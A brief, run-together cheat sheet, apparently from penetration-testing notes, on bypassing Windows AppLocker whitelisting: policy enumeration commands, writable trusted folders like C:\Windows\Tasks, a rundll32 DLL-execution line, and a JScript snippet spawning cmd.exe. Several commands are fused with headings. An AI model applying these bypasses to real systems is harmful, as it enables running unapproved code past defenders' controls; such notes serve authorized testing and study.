Application Whitelisting Bypass
Get-AppLockerPolicy -Local
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\ExeAppLocker Basic Bypass
Trusted Folders (usually C:\Windows\Tasks is clear)
accesschk.exe "user" C:\Windows -wusicacls.exe C:\Windows\Tasksrundll32 to execute unmanaged DLLs
rundll32 .\TestDll.dll,runAlternate Data Streams (ADS)
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");3rd Party Execution
System binary abuse
Last updated